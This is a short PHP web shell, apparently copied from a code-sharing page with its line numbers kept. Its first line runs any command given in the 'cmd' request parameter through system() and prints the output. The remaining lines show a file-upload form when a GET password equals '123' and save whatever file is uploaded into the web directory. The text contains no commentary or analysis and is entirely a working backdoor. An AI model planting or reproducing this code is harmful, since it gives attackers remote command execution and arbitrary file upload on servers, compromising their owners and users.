up

1. <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
2. <?php
3. error_reporting(E_ALL);
4. error_reporting(0);
5. if (isset ($_GET["passwd"]) and $_GET["passwd"]=="123")
6. {
7. ?>
8. <body onload="command.focus()">
9. <form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
10. <input type="hidden" name="MAX_FILE_SIZE" value="900000" />
11. upload: <input name="uploaded" type="file" /><br />
12. <input type="submit" value="Upload" />
13. </form>
14. </body>
15. <?php
16. }
17. $target_path = "./";
18.  
19. $target_path = $target_path . basename( $_FILES['uploaded']['name']);
20.  
21. if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path))
22. {
23. echo ";)";
24. }
25. ?>